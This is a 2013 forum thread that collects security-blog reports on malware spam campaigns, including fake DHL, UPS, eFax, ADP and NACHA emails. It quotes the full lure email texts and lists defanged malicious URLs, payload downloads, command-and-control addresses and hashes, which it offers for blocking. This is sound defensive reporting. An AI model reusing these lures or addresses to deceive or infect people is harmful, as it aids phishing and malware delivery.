If the parcel isn’t received within 15 working days our company will have the right to claim compensation from you for it’s keeping in the amount of $8.26 for each day of keeping of it.
You can find the information about the procedure and conditions of parcels keeping in the nearest office.
Thank you for using our services.
DHL Global
Edit your subscription | Unsubscribe
> https://lh3.ggpht.com/-7RU-0iFN_k8/UVGDBXTvZ4I/AAAAAAAABCo/gtvsmzUfMCk/s1600/dhl.png
Attached is a ZIP file called LABEL-ID-NY26032013-GFK73.zip which in turn contains LABEL-ID-NY26032013-GFK73.EXE (note that the date is encoded into the filename, so subsequent versions will change).
VirusTotal detections for this malware are low (7/46*). The malware resists analysis from common tools, so I don't have any deeper insight as to what is going on.
Update: Comodo CAMAS identified some of the phone-home domains which are the same as the ones used here**."
* https://www.virustotal.com/en/file/f95099fceb7d3e992b94455907b267c55e765a715e28df3ccee36c4127b2c92c/analysis/1364296589/
File name: LABEL-ID-NY26032013-GFK73.exe
Detection ratio: 7/46
Analysis date: 2013-03-26
** http://blog.dynamoo.com/2013/03/bank-of-america-spam-payment-receipt-25.html
Screenshot: http://threattrack.tumblr.com/post/46338583720/dhl-notification-spam
__
Fake eFax SPAM / hjuiopsdbgp .ru
- http://blog.dynamoo.com/2013/03/efax-corporate-spam-hjuiopsdbgpru.html
26 Mar 2013 - "This fake eFax spam leads to malware on hjuiopsdbgp.ru:
Date: Tue, 26 Mar 2013 06:23:36 +0800
From: LinkedIn [welcome @linkedin .com]
Subject: Efax Corporate
Attachments: Efax_Pages.htm
Fax Message [Caller-ID: 378677295]
You have received a 59 pages fax at Tue, 26 Mar 2013 06:23:36 +0800, (954)-363-5285.
* The reference number for this fax is [eFAX-677484317].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax ® is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax ® Customer Agreement.
The attachment Efax_Pages.htm leads to a malicious payload at [donotclick]hjuiopsdbgp .ru:8080/forum/links/column.php (report here*) hosted on the following IPs:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
95.211.154.196 (Leaseweb, Netherlands)
Blocklist:
66.249.23.64
69.46.253.241
95.211.154.196 ..."
* http://urlquery.net/report.php?id=1617697
... Detected suspicious URL pattern... Detected live BlackHole v2.0 exploit kit 95.211.154.196
___
Fake UPS SPAM / Label_8827712794 .zip
- http://blog.dynamoo.com/2013/03/ups-spam-label8827712794zip.html
26 Mar 2013 - "This fake UPS spam has a malicious EXE-in-ZIP attachment:
Date: Tue, 26 Mar 2013 20:54:54 +0600 [10:54:54 EDT]
From: UPS Express Services [service-notification @ups .com]
Subject: UPS - Your package is available for pickup ( Parcel 4HS287FD )
The courier company was not able to deliver your parcel by your address.
Cause: Error in shipping address.
You may pickup the parcel at our post office.
Please attention!
For mode details and shipping label please see the attached file.
Print this label to get this package at our post office.
Please do not reply to this e-mail, it is an unmonitored mailbox!
Thank you,
UPS Logistics Services.
CONFIDENTIALITY NOTICE...
The attachment Label_8827712794.zip contains a malicious binary called Label_8827712794.exe which has a VirusTotal score of just 6/46*. ThreatExpert reports** that the malware is a Pony downloader which tries to phone home to:
aseforum.ro (199.19.212.149 / Vexxhost, Canada)
23.localizetoday.com (192.81.131.18 / Linode, US)
Assuming that all domains on those are malicious, this is a partial blocklist:
192.81.131.18
199.19.212.149
aseforum .ro
htlounge .com
htlounge .net
topcancernews .com
23.localizetoday .com
23.localizedonline .com
23.localizedonline .net"
* https://www.virustotal.com/en/file/b1b537f767ce0a0cbf00141f97d5f814ecb9f2ae058895c9c85b3375b7d0e59e/analysis/1364312344/
File name: Label_8827712794.exe
Detection ratio: 6/46
Analysis date: 2013-03-26
** http://www.threatexpert.com/report.aspx?md5=c87f7ceeec9a9caa5e095b509d678f5e
Screenshot: http://threattrack.tumblr.com/post/46350420117/ups-package-pickup-spam
___
Fake Wire Transfer SPAM / hondatravel .ru
- http://blog.dynamoo.com/2013/03/wire-transfer-spam-hondatravelru.html
26 March 2013 - "This fake Wire Transfer spam leads to malware on hondatravel .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply @bounce.linkedin .com] On Behalf Of LinkedIn
Sent: 26 March 2013 11:52
Subject: Re: Wire Transfer Confirmation (FED_4402D79813)
Dear Bank Account Operator,
WIRE TRANSFER: FED68081773954793456
CURRENT STATUS: PENDING
Please REVIEW YOUR TRANSACTION as soon as possible.
The malicious payload is at [donotclick]hondatravel .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
These IPs were seen earlier with this attack**."
* http://urlquery.net/report.php?id=1618697
... Detected suspicious URL pattern... Blackhole 2 Landing Page 66.249.23.64
** http://blog.dynamoo.com/2013/03/efax-corporate-spam-hjuiopsdbgpru.html
Screenshot: http://threattrack.tumblr.com/post/46002028146/international-transfers-processing-service-spam
___
Fake TRAFFIC TICKET SPAM / hondatravel .ru
- http://blog.dynamoo.com/2013/03/ny-traffic-ticket-spam-hondatravelru.html
26 Mar 2013 - "I haven't seen this type of spam for a while, but here it is.. leading to malware on hondatravel .ru:
Date: Wed, 27 Mar 2013 04:24:14 +0330
From: "LiveJournal .com" [do-not-reply @livejournal .com]
Subject: Fwd: Re: NY TRAFFIC TICKET
New-York Department of Motor Vehicles
TRAFFIC TICKET
NEW-YORK POLICE DEPARTMENT
THE PERSON CHARGED AS FOLLOWS
Time: 2:15 AM
Date of Offense: 28/07/2012
SPEED OVER 50 ZONE
TO PLEAD CLICK HERE AND FILL OUT THE FORM
The malicious payload appears to be identical to this spam run* earlier today."
* http://blog.dynamoo.com/2013/03/wire-transfer-spam-hondatravelru.html
Screenshot: http://threattrack.tumblr.com/post/46359626397/new-york-traffic-ticket-spam
:mad::fear:
AplusWebMaster
2013-03-27, 15:32
FYI...
Fake Airline E-ticket receipt SPAM / illuminataf .ru
- http://blog.dynamoo.com/2013/03/british-airways-e-ticket-receipts-spam_27.html
27 Mar 2013 - "This fake airline ticket spam leads to malware on illuminataf .ru:
Date: Wed, 27 Mar 2013 03:23:05 +0100
From: "Xanga" [noreply @xanga .com]
Subject: British Airways E-ticket receipts
Attachments: E-Ticket-Receipt.htm
e-ticket receipt
Booking reference: JQ15191488
Dear,
Thank you for booking with British Airways.
Ticket Type: e-ticket
This is your e-ticket receipt. Your ticket is held in our systems, you will not receive a paper ticket for your booking.
Your itinerary is attached (Internet Exlplorer/Mozilla Firefox file)
Yours sincerely,
British Airways Customer Services ...
The attachment E-Ticket-Receipt.htm leads to a malicious payload at [donotclick]illuminataf .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
223.4.209.134 (Alibaba (China) Technology Co, China)
Blocklist:
66.249.23.64
69.46.253.241
223.4.209.134 ..."
* http://urlquery.net/report.php?id=1633301
... Detected suspicious URL pattern... Blackhole 2 Landing Page 69.46.253.241
___
Fake NACHA SPAM / mgithessia .biz
- http://blog.dynamoo.com/2013/03/nacha-spam-mgithessiabiz.html
27 March 2013 - "This fake NACHA spam leads to malware on mgithessia .biz:
From: "Олег.Тихонов@direct .nacha .org" [mailto:universe87 @mmsrealestate .com]
Sent: 27 March 2013 03:25
Subject: Disallowed Direct Deposit payment
Importance: High
To whom it may concern:
We would like to inform you, that your latest Direct Deposit via ACH transaction (Int. No.989391803448) was cancelled,because your business software package was out of date. The details regarding this matter are available in our secure section::
Click here for more information
Please consult with your financial institution to obtain the updated version of the software.
Kind regards,
ACH Network Rules Department
NACHA - The Electronic Payments Association
11329 Sunrise Valley Drive, Suite 865
Herndon, VA 20172
Phone: 703-561-1927 Fax: 703-787-1894
The malicious payload is at [donotclick]mgithessia .biz/closest/repeating-director_concerns.php although I am having difficulty resolving that domain, however it appears to be on 46.4.150.118 (Hetzner, Germany) and the payload looks something like this*.
* http://urlquery.net/report.php?id=1635808
... Detected live BlackHole v2.0 exploit kit 46.4.150.118
DNS services are provided by justintvfreefall .org which is also probably malicious. Nameservers are on 5.187.4.53 (Fornex Hosting, Germany) and 5.187.4.58 (the same).
Recommended blocklist:
46.4.150.118
5.187.4.53
5.187.4.58 ..."
___
Sendspace Spam
- http://threattrack.tumblr.com/post/46423886514/sendspace-spam
27 March, 2013 - "Subjects seen: You have been sent a file (Filename: [removed].pdf)
Typical e-mail details:
Sendspace File Delivery Notification:
You’ve got a file called [removed].pdf, (625.62 KB) waiting to be downloaded at sendspace.(It was sent by CONCHA ).
You can use the following link to retrieve your file:
Download
Thank you,
Sendspace, the best free file sharing service.
Malicious URLs:
my311 .com/info.htm - 173.246.66.199
contentaz .com/info.htm - 66.147.244.103
illuminataf .ru:8080/forum/links/column.php - 69.46.253.241, 66.249.23.64, 140.114.75.84 ..."
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/665842c6cd39c83729cc873b0f6a1f10/tumblr_inline_mkbrye8Kj91qz4rgp.png
___
Xerox WorkJet Pro Spam
- http://threattrack.tumblr.com/post/46443460555/xerox-workjet-pro-spam
27 March 2013 - "Subjects seen:
Fwd: Fwd: Scan from a Xerox W. Pro #[removed]
Typical e-mail details:
A Document was sent to you using a XEROX WorkJet PRO
SENT BY : Anderson
IMAGES : 4
FORMAT (.JPEG) DOWNLOAD
Malicious URLs:
thuocdonga .com/info.htm - 66.147.244.103
ilianorkin .ru:8080/forum/links/column.php - 69.46.253.241, 66.249.23.64, 140.114.75.84
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/471938a6819da525a3a5db17818c54d7/tumblr_inline_mkc615T7vs1qz4rgp.png
:fear::mad:
AplusWebMaster
2013-03-28, 14:16
FYI...
Fake Xerox ptr SPAM / ilianorkin .ru
- http://blog.dynamoo.com/2013/03/scan-from-xerox-w-pro-spam-ilianorkinru.html
28 March 2013 - "This fake printer spam leads to malware on ilianorkin .ru:
From: officejet @[victimdomain]
Sent: 27 March 2013 08:35
Subject: Fwd: Fwd: Scan from a Xerox W. Pro #589307
A Document was sent to you using a XEROX WorkJet PRO 481864299.
SENT BY : Omar
IMAGES : 9
FORMAT (.JPEG) DOWNLOAD
The malicious payload is at [donotclick]ilianorkin .ru:8080/forum/links/column.php (report here*) hosted on:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
140.114.75.84 (TANET, Taiwan)
Blocklist:
66.249.23.64
69.46.253.241
140.114.75.84 ..."
* http://urlquery.net/report.php?id=1652917
... Detected suspicious URL pattern... Blackhole 2 Landing Page 140.114.75.84
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/471938a6819da525a3a5db17818c54d7/tumblr_inline_mkc615T7vs1qz4rgp.png
___
Fake Changelog SPAM / Changelog_Urgent_N992.doc.exe
- http://blog.dynamoo.com/2013/03/changelog-spam-changelogurgentn992docexe.html
28 March 2013 - "This fake "changelog" spam has a malicious attachment Changelog.zip which in turn contains a malware file named Changelog_Urgent_N992.doc.exe
From: Logistics Express [admin @ups .com]
Subject: Re: Changelog 2011 update
Hi,
as promised changelog,
Michaud Abran
VirusTotal* detects the payload as Cridex. The malware is resistant to automated analysis tools, but Comodo CAMAS reports** the creation of a file C:\Documents and Settings\User\Application Data\KB00085031.exe which is pretty distinctive. If your email filter supports it, I strongly recommend that you configure it to block EXE-in-ZIP files as they are malicious in the vast majority of cases."
* https://www.virustotal.com/en/file/f18154fdb0d0620f40c392e595daf6023b6799768b50a91059e26149e977eee6/analysis/1364462703/
File name: Changelog_Urgent_N992.doc.exe
Detection ratio: 18/46
Analysis date: 2013-03-28
** http://camas.comodo.com/cgi-bin/submit?file=f18154fdb0d0620f40c392e595daf6023b6799768b50a91059e26149e977eee6
___
Fake Facebook SPAM / ipiniadto .ru
- http://blog.dynamoo.com/2013/03/facebook-spam-ipiniadtoru.html
28 Mar 2013 - "The email address says Filestube. The message says Facebook. This can't be good.. and in fact this message just leads to malware on ipiniadto .ru:
Date: Thu, 28 Mar 2013 04:58:33 +0600 [03/27/13 18:58:33 EDT]
From: FilesTube [filestube @filestube .com]
Subject: You have notifications pending
facebook
Hi,
Here's some activity you may have missed on Facebook.
BERTIE Goldstein has posted statuses, photos and more on Facebook.
Go To Facebook
See All Notifications
This message was sent to [redacted]. If you don't want to receive these emails from Facebook in the future or have your email address used for friend suggestions, please click: unsubscribe.
Facebook, Inc. Attention: Department 415 P.O Box 10005 Palo Alto CA 94303
The malicious payload is at [donotclick]ipiniadto .ru:8080/forum/links/column.php (report here*) hosted on the same IPs as used in this attack**:
66.249.23.64 (Endurance International Group, US)
69.46.253.241 (RapidDSL & Wireless, US)
140.114.75.84 (TANET, Taiwan)
Blocklist:
66.249.23.64
69.46.253.241
140.114.75.84 ..."
* http://urlquery.net/report.php?id=1661788
... Detected suspicious URL pattern... Blackholev2 redirection 66.249.23.64
** http://blog.dynamoo.com/2013/03/scan-from-xerox-w-pro-spam-ilianorkinru.html
___
Key Secured Message Spam
- http://threattrack.tumblr.com/post/46521340100/key-secured-message-spam
28 March 2013 - "Subjects seen:
Key Secured Message
Typical e-mail details:
You have received a Secured Message from:
[removed] @key .com
The attached file contains the encrypted message that you have received.
To decrypt the message use the following password - [removed]
To read the encrypted message, complete the following steps:
- Double-click the encrypted message file attachment to download the file to your computer.
- Select whether to open the file or save it to your hard drive. Opening the file displays the attachment in a new browser window.
- The message is password-protected, enter your password to open it.
This e-mail and any attachments are confidential and intended solely for the addressee and may also be privileged or exempt from
disclosure under applicable law. If you are not the addressee, or have received this e-mail in error, please notify the sender
immediately, delete it from your system and do not copy, disclose or otherwise act upon any part of this e-mail or its attachments.
If you have concerns about the validity of this message, please contact the sender directly. For questions about Key’s e-mail encryption service, please contact technical support at 888.764.0016.
Malicious URLs:
24.cellulazetrainingcenter .com/ponyb/gate.php
23.mylocalreports .info/ponyb/gate.php
htlounge .com:8080/ponyb/gate.php
rueba .com/eXkdB.exe
nikosst .com/yttur.exe
bmwautomotiveparts .com/kUXY.exe"
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/080f2b096ba63540be68691958d3b275/tumblr_inline_mkdvh344wN1qz4rgp.png
___
ADP Netsecure Spam
- http://threattrack.tumblr.com/post/46507370924/adp-netsecure-spam
28 March 2013 - "Subjects seen:
ADP Immediate Notification
Typical e-mail details:
ADP Immediate Notification
Reference #: [removed]
Thu, 28 Mar 2013 -01:38:59 -0800
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
flexdirect .adp.com/client/login.aspx
Please see the following notes:
• Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
• Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Malicious URLs:
forum.awake-rp .ru/kpindex.htm
ipiniadto .ru:8080/forum/links/column.php
otrs.gtg .travel/kpindex.htm
ej-co .ru/kpindex.htm
w w w.ddanports .com/kpindex.htm
yunoksoo.g3 .cc/kpindex.htm
w w w.nzles .com/kpindex.htm
thewellshampstead .co.uk/kpindex.htm
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/2ea94e8508efe466d2cf4df216066fd1/tumblr_inline_mkdkuhagxw1qz4rgp.png
Fake ADP Spam / ipiniadto .ru
- http://blog.dynamoo.com/2013/03/adp-spam-ipiniadtoru.html
28 Mar 2013 - "This fake ADP spam leads to malware on ipiniadto .ru:
Date: Thu, 28 Mar 2013 04:22:48 +0600 [03/27/13 18:22:48 EDT]
From: Bebo Service [service @noreply.bebo .com]
Subject: ADP Immediate Notification
ADP Immediate Notification
Reference #: 120327398
Thu, 28 Mar 2013 04:22:48 +0600
Dear ADP Client
Your Transfer Record(s) have been created at the web site:
https ://www.flexdirect .adp .com/client/login.aspx
Please see the following notes:
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the report(s).
Please do not respond or reply to this automated e-mail. If you have any questions or comments, please Contact your ADP Benefits Specialist.
This note was sent to acting users in your system that approach ADP Netsecure.
As usual, thank you for choosing ADP as your business affiliate!
Ref: 975316004
HR. Payroll. Benefits.
The ADP logo and ADP are registered trademarks of ADP, Inc.
In the business of your success is a service mark of ADP, Inc.
© 2013 ADP, Inc. All rights reserved.
The malicious landing page and recommended blocklist are the same as for this parallel attack* also running today."
* http://blog.dynamoo.com/2013/03/facebook-spam-ipiniadtoru.html
:fear::mad:
AplusWebMaster
2013-03-29, 17:55
FYI...
Fake 'Overdue Payment' Spam
- http://threattrack.tumblr.com/post/46594865279/overdue-payment-spam
March 29, 2013 - "Subjects seen:
Please respond - overdue payment
Typical e-mail details:
Please find attached your invoices for the past months. Remit the payment by 02/04/2013 as outlines under our “Payment Terms” agreement.
Thank you for your business,
Sincerely,
Caroline Givens
Malicious URLs:
24.cellutytelosangeles .com/ponyb/gate.php
24.cellutytela .com/ponyb/gate.php
topcancernews .com:8080/ponyb/gate.php
spireportal .net/L3ork1v.exe
ftp(DOT)riddlepress .com/bahpZsn6.exe
easy .com.gr/QpEQ.exe"
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/9d94dc2151d5e12cc468b27c3c55f157/tumblr_inline_mkfg5xe7bS1qz4rgp.png
Fake Overdue payment SPAM / INVOICE_28781731.zip
- http://blog.dynamoo.com/2013/03/please-respond-overdue-payment-spam.html
29 Mar 2013 - "This spam comes with a malware-laden attachment called INVOICE_28781731.zip:
Date: Fri, 29 Mar 2013 10:33:53 -0600 [12:33:53 EDT]
From: Victor_Lindsey @key .com
Subject: Please respond - overdue payment
Please find attached your invoices for the past months. Remit the payment by 02/04/2013
as outlines under our "Payment Terms" agreement.
Thank you for your business,
Sincerely,
Victor Lindsey
This e-mail has been sent from an automated system. PLEASE DO NOT REPLY...
Unzipping the attachment gives a malware filed called INVOICE_28781731.exe with an icon to look like a PDF file. VirusTotal* detections are 16/46 and are mostly pretty generic. Comodo CAMAS reports** a callback to topcancernews .com hosted on 199.19.212.149 (Vexxhost, Canada) which is also being used in this malware attack***. Looking for that IP in your logs might show if any of your clients."
* https://www.virustotal.com/en/file/d81fe01f843583d9a564f02887537d9a1a3e2b0fd5585dae536ef091ee4c1a16/analysis/1364586082/
File name: INVOICE_28781731.exe
Detection ratio: 16/46
Analysis date: 2013-03-29
** http://camas.comodo.com/cgi-bin/submit?file=d81fe01f843583d9a564f02887537d9a1a3e2b0fd5585dae536ef091ee4c1a16
*** http://blog.dynamoo.com/2013/03/ups-spam-label8827712794zip.html
___
Fake FlashPlayer/browser hijack in-the-wild
- http://blogs.technet.com/b/mmpc/archive/2013/03/26/there-was-a-flash-and-then-my-startpage-was-gone.aspx?Redirected=true
26 Mar 2013 - "... The file had been distributed with the file name FlashPlayer.exe and not surprisingly, when executed, it shows the following GUI, partly written in Turkish:
> https://www.microsoft.com/security/portal/blog-images/preflayer.jpg
... most users won’t realize that the program is going to change their browser’s start page. When hitting the button, this fake Flash Player installer downloads and executes a legitimate flash installer as FlashPlayer11.exe... It then changes the user’s browser start page. It changes the start page for the following browsers:
FireFox, Chrome, Internet Explorer, Yandex
... to one of the following pages:
hxxp ://www.anasayfada .net
hxxp ://www.heydex .com
These sites appear to be a type of search engine, but there are pop-up advertisements displayed on the pages, and there was an instance where I was redirected to a different page not of my choosing... Domain info...
hxxp ://www.anasayfada .net - 109.235.251.146
hxxps ://flash-player-download .com/ - 31.3.228.202
hxxp ://www.yonlen .net/ - 37.220.28.122
hxxp ://www.heydex .com - 188.132.235.218 [ now > 109.200.27.170 ]
It’s a fairly simple ruse – misleading file name, misleading GUI, deliberately inaccessible EULA... misleading file properties – and some of the files are even signed. And yet, we’ve received over 70,000 reports of this malware in the last week. Social engineering doesn’t have to be particularly sophisticated to be successful. So the message today is be wary. If you think something ‘feels’ wrong (like that missing scrollbar in the EULA) it may well be. Listen to those feelings and use them to protect yourself by saying 'no' to content you don't trust."
:mad:
AplusWebMaster
2013-04-01, 22:21
FYI...
Fake Facebook Security Check Page
- http://blog.trendmicro.com/trendlabs-security-intelligence/malware-phishes-with-fake-facebook-security-check-page/
Mar 31, 2013 - "Facebook’s enduring popularity means that cybercriminals find it a tempting lure for their malicious misdeeds. A newly-spotted phishing scam is no exception. We came across a malware sample, which we detected as TSPY_MINOCDO.A. The goal is to -redirect- users who visit Facebook to a spoofed page, which claims to be a part of the social networking website’s security check feature, even sporting the tagline “Security checks help keep Facebook trustworthy and free of spam”. It does this by redirecting all traffic to facebook .com and www .facebook .com to the system itself (using the affected machine’s HOST file). This ensures that the user can never reach the legitimate Facebook pages. At the same time, the malware is monitoring all browser activity and redirects the user to the malicious site. Users eager to log into Facebook may fall victim to this ruse, taking the ‘security check’ for face value. This may result in them entering their details and thus exposing their credit card accounts to cybercriminal infiltration... we also discovered that that the malware performs DNS queries to several domain names. What this means that the people behind this are prepared for server malfunction and has a backup to continue stealing information. To stay safe and aware of these threats, always keep in mind that social networking websites would never ask for your credit card or online banking account details for verification..."
Screenshot: https://www.net-security.org/images/articles/fake-fb-sec-check.jpg
___
Fake Last Month Remit Spam
- http://threattrack.tumblr.com/post/46851040279/last-month-remit-spam
Apr 1, 2013 - "Subjects seen:
FW: Last Month Remit
Typical e-mail details:
File Validity: 04/05/2013
Company : [removed]
File Format: Office - Excel
Internal Name: Remit File
Legal Copyright: ╘ Microsoft Corporation. All rights reserved.
Original Filename: Last month remit file.xls
Malicious URLs:
3ecompany .com:8080/ponyb/gate.php
24.chiaplasticsurgery .com/ponyb/gate.php
24.chicagobodysculpt .com/ponyb/gate.php
brightpacket .com/coS0GiKE.exe
extremeengineering .co.in/Vh3a9601.exe
CornwallCommuter .com/TLJrtcxA.exe
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/be3ae421bf8e83ca33aefa8dfc3902af/tumblr_inline_mkl0qsyvth1qz4rgp.png
:mad::fear:
AplusWebMaster
2013-04-02, 15:20
FYI...
Fake Changelog emails lead to malware
- http://blog.webroot.com/2013/04/02/spamvertised-re-changelog-as-promised-themed-emails-lead-to-malware/
April 2, 2013 - "... recently intercepted a malicious spam campaign, that’s attempting to trick users into thinking that they’ve received a non-existent “changelog.” Once gullible and socially engineered users execute the malicious attachment, their PCs automatically become part of the botnet operated by the cybercriminal/gang of cybercriminals...
Sample screenshot of the spamvertised email:
> https://webrootblog.files.wordpress.com/2013/03/email_spam_malware_malicious_software_social_engineering_changelog.png?w=869
Detection rate for the malicious attachment:
MD5: e01ea945b8d055c5c115ab58749ac502 * ... Worm:Win32/Cridex.E.
Upon execution, the sample creates the following processess on the affected hosts:
C:\WINDOWS\system32\cmd.exe” /c “C:\DOCUME~1\<USER>~1\LOCALS~1\Temp\exp1.tmp.bat
C:\Documents and Settings\<USER>\Application Data\KB00927107.exe
The following Registry Keys:
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CFBDC89D4
HKEY_CURRENT_USER\Software\Microsoft\Windows NT\S25BC2D7B ...
It then phones back to hxxp://85.214.143.90 :8080/DPNilBA/ue1elBAAAA/tlSHAAAAA/ and to hxxp://91.121.90.92 :8080/AJtw/UCyqrDAA/Ud+asDAA/
We’ve already seen the same C&C (85.214.143.90) used in a previously profiled malicious campaign..."
(More detail at the webroot URL above.)
* https://www.virustotal.com/en/file/f18154fdb0d0620f40c392e595daf6023b6799768b50a91059e26149e977eee6/analysis/1364475932/
File name: LLSMGR.EXE
Detection ratio: 35/46
Analysis date: 2013-04-01
- https://www.google.com/safebrowsing/diagnostic?site=AS:6724 - 85.214.143.90
- https://www.google.com/safebrowsing/diagnostic?site=AS:16276 - 91.121.90.92
___
Fake Sendspace SPAM / imbrigilia .ru
- http://blog.dynamoo.com/2013/04/sendspace-spam-imbrigiliaru.html
2 Apr 2013 - "This fake Sendspace spam leads to malware on imbrigilia .ru:
Date: Tue, 2 Apr 2013 03:57:26 +0000
From: "JOSIE HARMON" [HARMON_JOSIE @hotmail .com]
Subject: You have been sent a file (Filename: [redacted]-7191.pdf)
Sendspace File Delivery Notification:
You've got a file called [redacted]-463168.pdf, (172.5 KB) waiting to be downloaded at sendspace.(It was sent by JOSIE HARMON).
You can use the following link to retrieve your file:
Download Link
The file may be available for a limited time only.
Thank you,
sendspace - The best free file sharing service...
The malicious payload is at [donotclick]imbrigilia .ru:8080/forum/links/column.php (report here*) hosted on the same IPs used in this attack**:
80.246.62.143 (Alfahosting GmbH, Germany)
94.103.45.34 (ANKARAHOSTING, Turkey)
Blocklist:
80.246.62.143
94.103.45.34 ..."
* http://urlquery.net/report.php?id=1757102
... Detected suspicious URL pattern... Blackhole 2 Landing Page 94.103.45.34
** http://blog.dynamoo.com/2013/04/end-of-aug-statement-required-spam.html
Also: http://threattrack.tumblr.com/post/46942210602/sendspace-spam
2 Apr 2013
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/0e666483bc40644f546c02ae739932b3/tumblr_inline_mkmxxsEWUN1qz4rgp.png
___
Fake "End of Aug. Statement Required" SPAM / ivanovoposel .ru
- http://blog.dynamoo.com/2013/04/end-of-aug-statement-required-spam.html
2 April 2013 - "This spam leads to malware on ivanovoposel .ru:
From: messages-noreply @bounce.linkedin .com [mailto:messages-noreply@bounce .linkedin .com] On Behalf Of LinkedIn
Sent: 02 April 2013 10:15
Subject: Re: FW: End of Aug. Statement Reqiured
Hallo,
as reqeusted I give you inovices issued to you per jan. (Microsoft Internet Explorer).
Regards
SHONTA SCHMITT
Alternate names:
NORIKO Richmond
Raiden MORRISON
Attachments:
Invoice_U13726798 .htm
Invoice_U453718 .htm
Invoice_U913687 .htm
The attachment leads to malware on [donotclick]ivanovoposel .ru:8080/forum/links/column.php (report here*) hosted on:
80.246.62.143 (Alfahosting GmbH, Germany)
94.103.45.34 (ANKARAHOSTING, Turkey)
Blocklist:
80.246.62.143
94.103.45.34 ..."
* http://urlquery.net/report.php?id=1751267
... Detected live BlackHole v2.0 exploit kit 94.103.45.34
:mad::mad:
AplusWebMaster
2013-04-03, 16:55
FYI...
Something evil on 151.248.123.170
- http://blog.dynamoo.com/2013/04/something-evil-on-151248123170.html
3 April 2013 - "151.248.123.170 (Reg .ru, Russia) appears to be active in an injection attack at the moment. In the example I saw, the hacked site has injected code pointing to [donotclick]fdozwnqdb.4mydomain .com/jquery/get.php?ver=jquery.latest.js which then leads to a landing page on [donotclick]db0umfdoap.servegame .com/xlawr/next/requirements_anonymous_ordinary.php (report here*) which from the URL looks very much like a BlackHole Exploit kit. This server hosts a lot of sites using various Dynamic DNS domains. I would recommend blocking the Dynamic DNS domains as a block rather than trying to chase down these bad sites individually. In my experience, Dynamic DNS services are being abuse to such an extent that pre-emptive blocking is probably the safest approach..."
(Long list of recommended blocks at the dynamoo URL above.)
* http://urlquery.net/report.php?id=1778882
___
Fake eFax SPAM / ivanikako .ru
- http://blog.dynamoo.com/2013/04/efax-spam-ivanikakoru.html
3 April 2013 - "This fake eFax spam leads to malware on ivanikako .ru:
From: Global Express UPS [mailto:admin @ups .com]
Sent: 02 April 2013 21:12
Subject: Efax Corporate
Fax Message [Caller-ID: 189609656]
You have received a 40 pages fax at Wed, 3 Apr 2013 02:11:58 +0600, (708)-009-8464.
* The reference number for this fax is [eFAX-698329221].
View attached fax using your Internet Browser.
© 2013 j2 Global Communications, Inc. All rights reserved.
eFax Ž is a registered trademark of j2 Global Communications, Inc.
This account is subject to the terms listed in the eFax Ž Customer Agreement.
The malicious payload is at [donotclick]ivanikako .ru:8080/forum/links/column.php (report here*) hosted on:
93.187.200.250 (Netdirekt, Turkey)
94.103.45.34 (ANKARAHOSTING, Turkey)
208.94.108.238 (Fibrenoire, Canada)
Blocklist:
93.187.200.250
94.103.45.34
208.94.108.238 ..."
* http://urlquery.net/report.php?id=1786247
... Detected suspicious URL pattern... Blackholev2 redirection 94.103.45.34
Screenshot: https://gs1.wac.edgecastcdn.net/8019B6/data.tumblr.com/646911078b2358a4a41b93fac721e580/tumblr_inline_mkoo4xbN8o1qz4rgp.png
___
APT malware monitors mouse clicks to evade detection
- https://www.computerworld.com/s/article/9238062/New_APT_malware_monitors_mouse_clicks_to_evade_detection_researchers_say
April 2, 2013 - "... Called Trojan.APT.BaneChant, the malware is distributed via a Word document rigged with an exploit sent during targeted email attacks. The name of the document translates to "Islamic Jihad.doc." "We suspect that this weaponized document was used to target the governments of Middle East and Central Asia," FireEye researcher Chong Rong Hwa said Monday in a blog post*. The attack works in multiple stages. The malicious document downloads and executes a component that attempts to determine if the operating environment is a virtualized one, like an antivirus sandbox or an automated malware analysis system, by waiting to see if there's any mouse activity before initiating the second attack stage. Mouse click monitoring is not a new detection evasion technique, but malware using it in the past generally checked for a single mouse click... The rationale behind using this service is to bypass URL blacklisting services active on the targeted computer or its network... The backdoor program gathers and uploads system information back to a command-and-control server. It also supports several commands including one to download and execute additional files on the infected computers..."
* http://www.fireeye.com/blog/technical/malware-research/2013/04/trojan-apt-banechant-in-memory-trojan-that-observes-for-multiple-mouse-clicks.html
April 1, 2013
___
Fake Wire Transfer e-mails
- http://tools.cisco.com/security/center/viewThreatOutbreakAlert.x?alertId=28112
2013 April 03 - "... significant activity related to spam e-mail messages that claim to contain a wire transfer notification for the recipient. The text in the e-mail message attempts to convince the recipient to open the attachment and view the final confirmation notice. However, the .zip attachment contains a malicious .scr file that, when executed, attempts to infect the system with malicious code. E-mail messages that are related to this threat (RuleID5193 and RuleID5193KVR) may contain the following files:
out going wire. pdf.zip
npxo.scr
Sales Contract Order.zip
DEDE.scr
The npxo.scr file in the out going wire. pdf.zip attachment has a file size of 509,199 bytes. The MD5 checksum, which is a unique identifier of the executable, is the following string: 0x2A41A06A00F4CF58485AF938F01B128D
